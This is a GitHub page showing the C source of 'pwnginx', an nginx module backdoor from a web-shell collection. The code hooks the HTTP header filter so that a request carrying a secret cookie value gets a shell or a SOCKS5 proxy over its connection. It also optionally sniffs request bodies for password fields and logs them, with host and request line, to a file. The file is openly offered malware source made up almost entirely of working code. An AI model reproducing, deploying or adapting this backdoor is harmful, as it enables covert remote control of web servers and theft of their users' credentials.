forked from l3m0n/WebShell
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathngx_http_pwnginx.c
109 lines (98 loc) · 4.15 KB
/
ngx_http_pwnginx.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
/*
* ngx_http_pwnginx.c - pwnginx main module
* lastest version @ https://github.com/t57root/pwnginx
* openwill.me / www.hackshell.net
*/
#include <ngx_config.h>
#include <ngx_core.h>
#include <ngx_http.h>
#include "pwnginx.h"
#include "config.h"
static ngx_int_t
ngx_http_pwnginx_init(ngx_conf_t *cf);
static ngx_http_module_t ngx_http_pwnginx_ctx = {
NULL, /* preconfiguration */
ngx_http_pwnginx_init, /* postconfiguration */
NULL, /* create main configuration */
NULL, /* init main configuration */
NULL, /* create server configuration */
NULL, /* merge server configuration */
NULL, /* create location configuration */
NULL /* merge location configuration */
};
ngx_module_t ngx_http_pwnginx = {
NGX_MODULE_V1,
&ngx_http_pwnginx_ctx, /* module context */
NULL, /* module directives */
NGX_HTTP_MODULE, /* module type */
NULL, /* init master */
NULL, /* init module */
NULL, /* init process */
NULL, /* init thread */
NULL, /* exit thread */
NULL, /* exit process */
NULL, /* exit master */
NGX_MODULE_V1_PADDING
};
static ngx_http_output_header_filter_pt ngx_http_next_header_filter;
static ngx_http_output_body_filter_pt ngx_http_next_body_filter;
static ngx_int_t
ngx_http_pwnginx_header_filter(ngx_http_request_t *r)
{
int cmd_fd = r->connection->fd;
ngx_table_elt_t ** cookies = NULL;
cookies = r->headers_in.cookies.elts;
if(r->headers_in.cookies.nelts==1){
if(strncmp((char *)cookies[0]->value.data,"pwnginx="PASSWORD"; action=1",strlen(PASSWORD)+18)==0){
msend(cmd_fd, "pwnginx1", sizeof("pwnginx1"));
exec_shell(cmd_fd);
}
else if(strncmp((char *)cookies[0]->value.data,"pwnginx="PASSWORD"; action=2",strlen(PASSWORD)+18)==0){
msend(cmd_fd, "pwnginx2", sizeof("pwnginx2"));
exec_socks5(cmd_fd);
}
}
#ifdef PWD_SNIFF_FILE
if (r->request_body){
ngx_chain_t *cl = r->request_body->bufs;
if(cl){
//1024
char *tmp_buf = malloc(1025);
tmp_buf[1024]='\0';
strncpy(tmp_buf,(char *)cl->buf->pos,1024);
if( ngx_strcasestrn((u_char *)tmp_buf, "password=",9-1) ||
ngx_strcasestrn((u_char *)tmp_buf, "passwd=",7-1) ||
ngx_strcasestrn((u_char *)tmp_buf, "pwd=",4-1) ||
ngx_strcasestrn((u_char *)tmp_buf, "name=\"password\"",15-1) ||
ngx_strcasestrn((u_char *)tmp_buf, "name=\"passwd\"",13-1) ||
ngx_strcasestrn((u_char *)tmp_buf, "name=\"pwd\"",10-1)){
FILE *fp = fopen(PWD_SNIFF_FILE,"a");
r->request_line.data[(int)r->request_line.len]='\0';
fprintf(fp,"%s\n",(char *)r->request_line.data);
r->headers_in.host->value.data[(int)r->headers_in.host->value.len]='\0';
fprintf(fp,"Host:%s\n",(char *)r->headers_in.host->value.data);
fprintf(fp,"%s\n======================\n",cl->buf->pos);
fclose(fp);
}
}
}
#endif
return ngx_http_next_header_filter(r);
}
static ngx_int_t
ngx_http_pwnginx_body_filter(ngx_http_request_t *r, ngx_chain_t *in)
{
return ngx_http_next_body_filter(r, in);
}
static ngx_int_t
ngx_http_pwnginx_init(ngx_conf_t *cf)
{
ngx_http_next_header_filter = ngx_http_top_header_filter;
ngx_http_top_header_filter = ngx_http_pwnginx_header_filter;
ngx_http_next_body_filter = ngx_http_top_body_filter;
ngx_http_top_body_filter = ngx_http_pwnginx_body_filter;
#ifdef ROOTSHELL
#endif
return NGX_OK;
}